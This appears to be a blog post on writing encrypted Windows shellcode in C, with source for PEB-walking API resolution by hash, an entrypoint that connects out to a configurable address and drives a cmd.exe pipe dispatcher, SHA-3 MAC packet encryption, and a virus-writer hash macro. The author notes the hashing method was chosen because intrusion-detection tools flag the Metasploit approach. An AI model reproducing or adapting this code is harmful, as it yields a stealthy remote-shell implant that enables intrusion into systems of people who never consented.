So the codes I wrote in the past were small but this PIC can exceed 5KB once extracted from binary which is something I really wouldn’t want to write by hand although it’s safe to assume an assembly version is likely to be at least 50% smaller.

For a PIC like this using encryption of packets, it’s certainly doable to implement the entire thing in Assembly but I can imagine it being an unpleasant experience. The purpose of the Asmcodes series was essentially to evaluate potential cryptographic primitives for shellcode.

I think it would be wise to develop a PIC in C first before considering an assembly implementation. Once you’ve ironed out any problems, that will make writing assembly much easier.

Memory layout

A general layout of our global memory is required for data and API addresses. API addresses are likely to consume less space than data so I would recommend placing a structure for API at the very beginning of allocated memory.

For this particular code, we use some (but not all) 28 API which requires 112 bytes on x86 and 224 bytes for x64. I’ll explain later why some are not currently used, it’s mostly for legacy reasons.

They are resolved by 32-bit hash from the PEB (Process Environment Block) that contains among many other things a list of DLL (Dynamic-link Libraries) loaded into our target process.

We identify the variables that will be required by multiple functions and declare these in a structure I’ve simply called v_tbl. (I may need to revise this as some may think it means virtual table)

Pointers to API addresses are stored in a structure called f_tbl and this is then placed inside another structure with v_tbl to define our global memory.

Anyone that’s ever looked at disassembly for a C++ program will notice that each class object or instance of an object is passed to each class method. I’ve adopted a similar approach in C except you can visibly see the parameter passed to each function in source code.

If you’re familiar with object oriented programming, you can view the v_tbl structure as properties of a class and the f_tbl structure as methods. So you might be asking why not just have all memory space in one area? There’s a reason to separate the two and it’s mainly to do with reducing opcode sizes.

In assembly, it would be ideal to store API at start of structure and data variables at end so that we’re accessing the API with the least amount of bytes.

It may be possible to use a free unused or reserved slot in the TEB (Thread Environment Block) or PEB (Process Environment Block) which we can then access from each function through the FS or GS selector depending on version of Windows but I have not investigated this.

Another issue is the use of stack for storing data. cs32.asm and cs64.asm are required to allocate large blocks of stack memory.

As a general rule I would advise you minimize amount of stack allocated to avoid crashing on some systems. In future I will most likely use the heap for global memory instead of stack.

Data structure

The v_tbl represents our variables which are for the most part required by more than one function, but not all. Actually, this could be reduced but it’ll do for now.

// shellcode data structure
// Variables shared between the PIC's functions; stored as member `v` of
// sc_tbl, after the API table.
typedef struct _sc_v_tbl_t {
  spp_blk             blk;    // NOTE(review): spp_blk is declared elsewhere; purpose not visible here
  SOCKET              s;      // socket
  HANDLE              out1;   // CreateNamedPipe
  HANDLE              in0;    // CreatePipe read
  HANDLE              in1;    // CreatePipe write
  HANDLE              out0;   // CreateFile
  // event handles start here
  HANDLE              evt0;   // WSACreateEvent
  HANDLE              evt1;   // CreateEvent for cmd.exe
  PROCESS_INFORMATION pi;     // NOTE(review): presumably the spawned cmd.exe process - confirm
  DWORD               evt_cnt; // NOTE(review): presumably number of event handles in use - confirm
  DWORD               secure;  // NOTE(review): meaning not visible here - confirm
  HCRYPTPROV          hProv;   // crypto provider handle, filled by CryptAcquireContext
  spp_tek             tek;     // NOTE(review): spp_tek is declared elsewhere; purpose not visible here
  aes_ctx             ctx;     // AES context (type aes_ctx)
} v_tbl;

Code structure

The f_tbl represents our ‘function table’ which is just a structure to hold addresses of each API required by all functions. Even if the application space does not use TCP, the PIC will initialize Windows Sockets before attempting to make an outgoing connection.

// api table structure
// The anonymous union overlays an array of 28 generic pointers with 28
// named, typed function pointers, so the table can be filled by index
// (api[i]) and then called by name. The member order must match the order
// of the hashes used to fill api[]: 15 kernel32, 10 ws2_32, 3 advapi32.
typedef struct _sc_f_tbl_t {
  union {
    LPVOID api[28];   // indexed view, one slot per named pointer below
    struct {
      // kernel32
      CreateNamedPipe_t                pCreateNamedPipe;
      CreatePipe_t                     pCreatePipe;
      CreateFile_t                     pCreateFile;
      WriteFile_t                      pWriteFile;
      ReadFile_t                       pReadFile;
      GetOverlappedResult_t            pGetOverlappedResult;
      CreateProcess_t                  pCreateProcess;
      TerminateProcess_t               pTerminateProcess;
      CreateEvent_t                    pCreateEvent;
      GetTickCount_t                   pGetTickCount;
      GetLastError_t                   pGetLastError;
      CloseHandle_t                    pCloseHandle;
      WaitForMultipleObjects_t         pWaitForMultipleObjects;
      Wow64DisableWow64FsRedirection_t pWow64DisableWow64FsRedirection;
      GetFileSizeEx_t                  pGetFileSizeEx;
      // ws2_32
      socket_t                         psocket;
      connect_t                        pconnect;
      send_t                           psend;
      recv_t                           precv;
      closesocket_t                    pclosesocket;
      ioctlsocket_t                    pioctlsocket;
      WSAEventSelect_t                 pWSAEventSelect;
      WSAEnumNetworkEvents_t           pWSAEnumNetworkEvents;
      WSACreateEvent_t                 pWSACreateEvent;
      WSAStartup_t                     pWSAStartup;
      // advapi32
      CryptAcquireContextA_t           pCryptAcquireContext;
      CryptGenRandom_t                 pCryptGenRandom;
      CryptReleaseContext_t            pCryptReleaseContext;
    };
  };
} f_tbl;

Both f_tbl and v_tbl are placed in one structure and this represents our global memory.

// Global memory of the PIC: the API table comes first, followed by the
// shared variables. A pointer to this structure is what the PIC's
// functions receive.
typedef struct sc_tbl_t {
  f_tbl f; // function table  (code section)
  v_tbl v; // variables table (data section)
} sc_tbl;

Resolving API

A clever and clean way to resolve and invoke an API which is now part of the Metasploit project is originally based on this shellcode for windows which was used for a CTF by some Spanish dudes in July 2008 well before it was modified and added to Metasploit repository.

While it’s a neat way to call API, some IDS software now easily recognize this as being shellcode and so I’ve reverted back to the traditional method of calling API from C using code based on GetProcAddressWithHash.h from Matt Graeber’s PIC_Bindshell which can also support resolving 64-bit API.

The main modification is how hash of DLL is generated and resolving forward references. Instead of using the Unicode string of DLL in PEB, it’s calculated from the DLL header. In addition to this, if we have a forward reference, a new hash for DLL and API is generated before attempting to resolve.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 * dwHash is api_hash(export DLL name) + api_hash(API name).
 * Each module in the PEB load-order list is searched. A
 * forwarded export ("DLL.Function") is resolved by hashing
 * the forwarder's DLL and API names and searching again.
 *
 * Returns the API address, or NULL if nothing matched.
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, i, j;
  DWORD                    rva, api_h, dll_h;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll, p;
  LPVOID                   api_adr=0;
  CHAR                     dll_name[64], api_name[128];
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    
    // a module exporting by ordinal only has no names; without this
    // check sym[cnt-1] below would index with an underflowed count
    if (cnt==0) continue;
    
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    // calculate hash of DLL string
    dll_h = api_hash(dll);
    
    // names are scanned from last to first
    do {
      // calculate hash of api string
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      // add to DLL hash and compare
      if (api_hash(api)+dll_h == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        // is this a forward reference? (address lies inside the
        // export directory, so it is a "DLL.Function" string)
        if ((PBYTE)api_adr >= (PBYTE)exp &&
            (PBYTE)api_adr <  (PBYTE)exp + 
            dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
        {
          DEBUG_PRINT("%08X is forwarded to %s", 
              dwHash, api_adr);
              
          // copy DLL name up to the '.', leaving room for
          // ".DLL" and the terminating null in dll_name
          for (i=0, p=(PCHAR)api_adr; 
              p[i] != 0 && p[i] != '.' && 
              i < sizeof(dll_name)-5; i++) 
          {
            dll_name[i] = p[i];
          }
          // no '.' found (malformed or oversized forwarder):
          // treat as unresolved instead of reading past the string
          if (p[i] != '.') {
            api_adr = 0;
            break;
          }
          dll_name[i]   = '.';
          dll_name[i+1] = 'D';
          dll_name[i+2] = 'L';
          dll_name[i+3] = 'L';
          dll_name[i+4] = 0;
          // copy API name to buffer (text after the '.')
          for(j=0; p[++i] != 0 && 
              j < sizeof(api_name)-1; j++) 
          { 
            api_name[j] = p[i]; 
          }
          api_name[j] = 0;
          // calculate hash for DLL and API
          dll_h = api_hash(dll_name);
          api_h = api_hash(api_name);
          DEBUG_PRINT("hash for %s and %s = %08X", 
              dll_name, api_name, dll_h + api_h);
          // now try again
          api_adr = getapi(dll_h + api_h);
          // if we don't have at this point, bail out.
        }
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

The initialization resolves a table of API hashes and stores in f_tbl on the stack.

/**F*********************************************
 *
 * entrypoint of PIC
 *
 * Loads ws2_32 and advapi32, resolves the API table by
 * hash into sc_tbl on the stack, connects to the
 * configured address, then runs the key exchange and
 * dispatcher. Returns early if an API this function
 * calls itself could not be resolved.
 *
 ************************************************/
#ifdef XALONE
void mainCRTStartup(void)
#else
void entrypoint(void)
#endif
{
  WSADATA            wsa;
  struct sockaddr_in sin;
  sc_tbl             x;
  DWORD              i;
  int                r;
  char               ws2_32[]={'w','s','2','_','3','2','\0'};
  char               adv_32[]={'a','d','v','a','p','i','3','2','\0'};
  LoadLibrary_t      pLoadLibrary;

  // hashes in the same order as the members of f_tbl
  DWORD api_tbl[28] = 
{ // kernel32
  0x9B1D3EA9, 0xE6FA65BF, 0x0BEEEE0C, 0xD7F74F5F,
  0xE0E73F55, 0x5874B33B, 0xB6A0D8D1, 0x09228FC6,
  0xC0F188F0, 0xA7C0D163, 0x2608EFA5, 0x9FEA6E52,
  0xB4682C63, 0xCA1BB2C6, 0x727CC43E,
  // ws2_32
  0x9D920334, 0xB50DF1B2, 0x3DD3116A, 0x3B7B117C,
  0xCE2971AD, 0x424589CE, 0x929726BE, 0x272C063F,
  0x26EF0516, 0xB0E0E991,
  // advapi32
  0x86904799, 0xBD78D522, 0xB635E033 };
  
  // zero initialize memory
  memset ((uint8_t*)&x, 0, sizeof(x));
  // also clear the address so sin_zero is not left as stack garbage
  memset ((uint8_t*)&sin, 0, sizeof(sin));
  
  // load required modules just in case unavailable in PEB
  // get address for LoadlibraryA
  pLoadLibrary=(LoadLibrary_t)getapi(0x7C3B28ED);
  
  // nothing can be loaded without it; do not call through NULL
  if (pLoadLibrary == NULL) {
    DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
        0x7C3B28ED);
    return;
  }
  
  // load ws2_32 
  pLoadLibrary(ws2_32);
  
  // load advapi32
  pLoadLibrary(adv_32);
  
  // resolve our api addresses
  for (i=0; i<sizeof(api_tbl)/sizeof(DWORD); i++) {
    x.f.api[i]=getapi(api_tbl[i]);
    if (x.f.api[i] == NULL) {
      DEBUG_PRINT("Critical failure: Unable to resolve API for %08X",
          api_tbl[i]);
      // not fatal here: not every entry in the table is used
      //return;
    }
  }
  
  // the API called directly below must be present
  if (x.f.pWSAStartup          == NULL ||
      x.f.pCryptAcquireContext == NULL ||
      x.f.psocket              == NULL ||
      x.f.pconnect             == NULL ||
      x.f.pclosesocket         == NULL ||
      x.f.pCryptReleaseContext == NULL)
  {
    return;
  }
  
  // initialize winsock
  x.f.pWSAStartup (MAKEWORD(2, 2), &wsa);
  
  // initialize crypto
  x.v.hProv=0;
  
  x.f.pCryptAcquireContext (&x.v.hProv, 
      NULL, NULL, PROV_RSA_AES, 
      CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
      
  // create tcp socket
  x.v.s=x.f.psocket (AF_INET, 
      SOCK_STREAM, IPPROTO_TCP);
      
  // initialize network address, this requires changing before deployment
  sin.sin_port             = HTONS(1234);
  sin.sin_family           = AF_INET;
  sin.sin_addr.S_un.S_addr = 0x0100007F; // 127.0.0.1
  
  // connect to server
  r=x.f.pconnect (x.v.s, 
      (const struct sockaddr*)&sin, sizeof (sin));
  
  // connect returns 0 on success
  if (!r)
  {
    // perform key exchange
    key_xchg(&x);
    // execute dispatcher
    dispatch(&x);
  }
  // close socket
  x.f.pclosesocket (x.v.s);
  // release crypto context
  x.f.pCryptReleaseContext(x.v.hProv, 0);
  
  // cleanup and exit, not used in final code
  //WSACleanup();
  //return 0;
}

API hash algorithm

The api_hash algorithm used in the shellcode is the same as that found in Metasploit, except the strings are converted to lowercase before hashing. The following SHA-3 based alternative also works, but it is far slower and delays the shellcode by up to 10 seconds on my system while it resolves API.

// generate sha3-256 hash of dll and api
//
// The digest covers a 32-bit secret, the DLL name with every byte
// OR'ed with 0x20 (at most 64 bytes), and the API name as given.
// Only the first 32 bits of the digest are returned.
uint32_t api_hash(char dll[], char api[])
{ 
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX ctx;
  int      i, len;
  uint8_t  f[64+1]; 
  uint32_t s = 0x9e3779b9UL; // change to something unique
    
  SHA3_Init(&ctx, SHA3_256);         // create 256-bit hash
  SHA3_Update(&ctx, &s, sizeof(s));  // unique secret

  // copy dll converted to lowercase
  for (i=0; dll[i] != 0 && i<(int)sizeof(f)-1; i++) {
    f[i] = (uint8_t)(dll[i] | 0x20);
  }
  f[i] = 0;
  SHA3_Update(&ctx, f, i);
  
  // measure the API name inline rather than with strlen, so the
  // PIC does not depend on a C library routine
  for (len=0; api[len] != 0; len++);
  SHA3_Update(&ctx, api, len);
  SHA3_Final(h.b, &ctx);
  
  // only return the first 32-bits
  return h.w[0];
}

If there’s a way to shorten the time required to resolve hashes using SHA-3, I’ll add it later.
Here’s the new getapi function with sha3 hashing included but again it’s too slow.

/**F*********************************************
 *
 * Obtain address of API from PEB based on hash
 *
 * SHA-3 variant: dwHash is the first 32 bits of
 * SHA3-256(secret || lowercase DLL name || API name).
 * The DLL part is hashed once per module and the
 * context is copied for each exported name.
 *
 * Returns the API address, or NULL if nothing matched.
 *
 ************************************************/
LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PVOID                    base;
  DWORD                    cnt=0, rva;
  PIMAGE_DATA_DIRECTORY    dir;
  PIMAGE_EXPORT_DIRECTORY  exp;
  PDWORD                   adr;
  PDWORD                   sym;
  PWORD                    ord;
  PCHAR                    api, dll;
  LPVOID                   api_adr=0;
  
  union {
    uint8_t  b[32];
    uint32_t w[8];
  } h;
  
  SHA3_CTX                 ctx1, ctx2;
  int                      i;
  uint8_t                  f[64+1]; 
  uint32_t                 s = 0x9e3779b9UL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    base = dte->DllBase;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2OFS(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
    rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    
    // if no exports, continue
    if (rva==0) continue;
    
    exp = (PIMAGE_EXPORT_DIRECTORY) RVA2OFS(ULONG_PTR, base, rva);
      
    cnt = exp->NumberOfNames;
    
    // a module exporting by ordinal only has no names; without this
    // check sym[cnt-1] below would index with an underflowed count
    if (cnt==0) continue;
    
    adr = RVA2OFS(PDWORD,base, exp->AddressOfFunctions);
    sym = RVA2OFS(PDWORD,base, exp->AddressOfNames);
    ord = RVA2OFS(PWORD, base, exp->AddressOfNameOrdinals);
    dll = RVA2OFS(PCHAR, base, exp->Name);
    
    SHA3_Init(&ctx1, SHA3_256);   // create 256-bit hash
    SHA3_Update(&ctx1, &s, sizeof(s));  // unique secret

    // copy dll converted to lowercase
    for (i=0; dll[i] != 0 && i<(int)sizeof(f)-1; i++) {
      f[i] = (uint8_t)(dll[i] | 0x20);
    }
    f[i] = 0;
    SHA3_Update(&ctx1, f, i);
  
    // names are scanned from last to first
    do {
      // locate api string and measure its length
      api = RVA2OFS(PCHAR, base, sym[cnt-1]);
      for (i=0; api[i] != 0; i++);
      // continue from the per-DLL context instead of rehashing the prefix
      memcpy ((uint8_t*)&ctx2, (uint8_t*)&ctx1, sizeof(SHA3_CTX));
      SHA3_Update(&ctx2, api, i);
      SHA3_Final(h.b, &ctx2);
      // compare first 32 bits of the digest with the requested hash
      if (h.w[0] == dwHash) {
        // return address of function
        api_adr=RVA2OFS(LPVOID, base, adr[ord[cnt-1]]);
        break;
      }
    } while (--cnt && api_adr==0);
    if (api_adr!=0) break;
  }
  return api_adr;
}

Storing strings

Strings must be stored as character arrays otherwise the compiler will automatically store the string and a pointer to it in the data section which we must avoid for a PIC. For example, this PIC requires socket API from ws2_32.dll and crypto API from advapi32.dll but sometimes these are not already loaded in memory. The PIC will load these 2 libraries before trying to resolve any other API at runtime which requires their names be passed to LoadLibrary API.

// Module names spelled out as character arrays rather than string
// literals; these are the names passed to LoadLibrary.
char ws2_32[]={'w','s','2','_','3','2','\0'};
char adv_32[]={'a','d','v','a','p','i','3','2','\0'};

CPU intrinsics

Even with /Os flag, sometimes the MSVC compiler will think you’re silly and automatically replace FOR loops with memset or memcpy depending on what the loop does. It’s slightly annoying because if I wanted to use memset or memcpy, I’d use them. Since these are external C library functions, I usually have to replace some FOR loops with intrinsics.

You could of course include your own implementation of memset and memcmp functions which might be a better idea but what I normally do is try using the intrinsic directive which should automatically use STOSB/STOSD for memset, MOVSB/MOVSD for memcpy and CMPSB/CMPSD for memcmp.

#pragma intrinsic(memcmp, memcpy, memset)

However, Microsoft has this to say:

The compiler may call the function and not replace the function call with inline instructions, if it will result in better performance.

If the compiler still doesn’t play ball, I’ll define the following.

// Map the C library routines onto the string-instruction intrinsics.
// Arguments are parenthesised and cast to the intrinsic's parameter
// types so any pointer type or expression can be passed.
// Unlike the library functions, these expressions yield no value.
// NOTE: __movsb copies forward only, so the memmove mapping is not safe
// for overlapping buffers where the destination starts inside the source.
#define memcpy(x,y,z) __movsb((unsigned char*)(x),(const unsigned char*)(y),(z))
#define memmove(x,y,z) __movsb((unsigned char*)(x),(const unsigned char*)(y),(z))
#define memset(x,y,z) __stosb((unsigned char*)(x),(unsigned char)(y),(z))

This usually fixes the issue but when the compiler is stubborn and refuses to substitute memset/memcpy I replace both C functions with either __stosb or __movsb directly.

If all that fails! Consider using an older version of MSVC or try mingw. I’m using MSVC 2010 and believe MSVC 2013 and later versions have dropped support for replacing memcmp with REP CMPSB even when /Os is used.

Any other problems might be related to bit rotations used for encryption operations although any decent compiler will avoid using SHR/SHL/OR to perform a bit rotation. When in doubt, try using _rotl or _rotr. For byte swapping use _bswap (INTEL compiler) or _byteswap_ulong (MSVC).

Include the following if switching between MSVC or INTEL compiler.

#ifdef _MSC_VER
#include <intrin.h>
#else
#include <x86intrin.h>
#endif

Compiler Flags

The only flags I’ve used attempt to reduce code and omit stack security checking.

@echo off
rem Assemble cs32.asm, compile the C sources, link everything into spz.exe,
rem run xbin on its .text section, then remove the intermediate objects.
setlocal

rem Compiler switches shared by every C translation unit.
rem NOTE(review): -O2 follows -Os on the same command line; confirm which of
rem the two (size vs. speed) the compiler actually honours.
set CFLAGS=-c -nologo -Os -O2 -Gm- -GR- -EHa- -Oi -GS-

yasm -fwin32 cs32.asm -ocs32.obj

for %%f in (aes sha3 modexp) do cl.exe %CFLAGS% %%f.c
cl.exe %CFLAGS% -DXALONE spz.c

link /order:@order.txt /base:0 spz.obj sha3.obj aes.obj modexp.obj cs32.obj -subsystem:console -nodefaultlib kernel32.lib -stack:0x100000,0x100000
xbin spz.exe .text
del *.obj

endlocal

Assembly macros for calculating hashes

Assemblers with macro support provide a way to compute hashes of strings at assembly time. The earliest examples of this were demonstrated in viruses computing CRC hashes of API strings.

The following macro for example is from a virus writer Vecna and based on algorithm originally proposed by LSD-PL in their winasm paper back in 2002.

; hash_string: compute a 32-bit hash of a string at assembly time.
;
; On exit the assembly-time symbol `hash` holds the result. The symbols
; `len` and `i` are used as scratch and are overwritten as well.
hash_string macro s
  hash = 0
  len  = 0

  ; first pass: count the characters of the argument
  irpc c, <s>
    len = len + 1
  endm
  
  i = 0
  
  ; second pass: fold every character except the first and the last one
  ; into the hash (presumably those two are the delimiters surrounding the
  ; string -- confirm against the call sites)
  irpc c, <s>
    if i ne 0
      if i ne (len-1)
        ; rotate the 32-bit hash left by 7 bits ...
        hash = ((hash shl 7) and 0FFFFFFFFh) or (hash shr (32-7))
        ; ... then xor in the current character
        hash = hash xor '&c'
      endif
    endif
    i = i + 1
  endm
endm

An even more clever way to generate MD5 hashes of strings was demonstrated by talented coder drizz. The source of this is too complicated to include here but for those curious, have a look here.

Arithmetic Functions for large integers

The public key cryptography we’re mostly familiar with today uses big number libraries to perform the computations necessary to protect information.

Most sane people will use a well established cryptography library to do all this but since our PIC can’t depend on any libraries we need to implement our own routines.

But it’s not all bad. In comparison to Elliptic Curve and Lattice based encryption, RSA or Diffie Hellman only uses modular arithmetic which requires large keys but requires the least amount of code. As demonstrated here, a modexp function for x86 can be implemented in 140 bytes!

There’s no Karatsuba or Montgomery multiplication used since our goal is to reduce code as much as possible and that means keeping it simple.

See modexp.c for functions that perform Modular Exponentiation.

There’s a paper published in 2007 that discusses an encrypted payload similar to what I discuss here. An Encrypted Payload Protocol and Target-Side Scripting Engine by Dino Dai Zovi describes a payload using RC4 for symmetric encryption and ElGamal for key agreement however no source code for this was ever released.

Dino states the total size of Modular Exponentiation was approx. 1200 bytes which sounds about right if using bit shifting and addition instead of just addition. Remember: shifting left by 1 is the same as multiplying by 2 or simply adding a value to itself. 😉

Authenticated Encryption

It would appear using AEAD (Authenticated Encryption with Associated Data) for packet encryption will become a standard eventually. TLS 1.3 will use only AEAD algorithms and I would expect other protocols to follow suit. Actually, 6 authenticated encryption modes (OCB 2.0, Key Wrap, CCM, EAX, Encrypt-then-MAC (EtM), and GCM) have been standardized in ISO/IEC 19772:2009 although it’s not clear what will be used in future.

The PIC uses an EtM (Encrypt Then MAC) scheme in order to reduce code but I have examined a few of the CAESAR submissions and think Ketje from some of the same authors behind Rijndael and Keccak looks good.

SHA-3 256-bit truncated to 96-bits provides integrity of encrypted packets. The hash is appended to end of 16-byte aligned ciphertext before being transmitted.

On the receiving end, we use the same key to generate the MAC and compare it with the 96 bits we’ve received. If they match, we can presume it was sent by a trusted party.

/**F*********************************************
 *
 * Compute the MAC for a block of SPP data
 *
 * Feeds x->v.tek.mkey (SPP_MKEY_LEN bytes) and
 * then x->v.blk.buf (inlen bytes) through SHA-3,
 * and copies SPP_MAC_LEN bytes of the resulting
 * digest to out.
 *
 ************************************************/
VOID spp_mac(sc_tbl *x, DWORD inlen, PBYTE out)
{
  BYTE     digest[SHA3_256];
  SHA3_CTX ctx;

  // key first, then the data it authenticates
  SHA3_Init(&ctx, SHA3_256);
  SHA3_Update(&ctx, x->v.tek.mkey, SPP_MKEY_LEN);
  SHA3_Update(&ctx, x->v.blk.buf, inlen);
  SHA3_Final(digest, &ctx);

  // only SPP_MAC_LEN bytes of the digest are handed back
  memcpy(out, digest, SPP_MAC_LEN);
}

Todo

The PIC client is susceptible to a MitM (Man In The Middle) attack because it does not verify if the public key sent by a server is from a trusted party. We can solve this by signing the public key or simply embedding one within the PIC before deployment avoiding the need to receive one at all.

Summary

Using C or C++ to write PICs that can run on multiple architectures makes more sense than writing each PIC in pure assembly. However, I would point out up to 50-60% of code can be reduced when PIC is written in pure assembly and so it’s not obsolete just yet!

I hope that, based on these sources, more research will be done into using C for writing PICs and that it proves more appealing than writing in pure assembly.

See sources here

Posted in assembly, cryptography, diffie hellman merkle, networking, programming, public key exchange, security, shellcode, windows | Tagged , , , , , , , | Leave a comment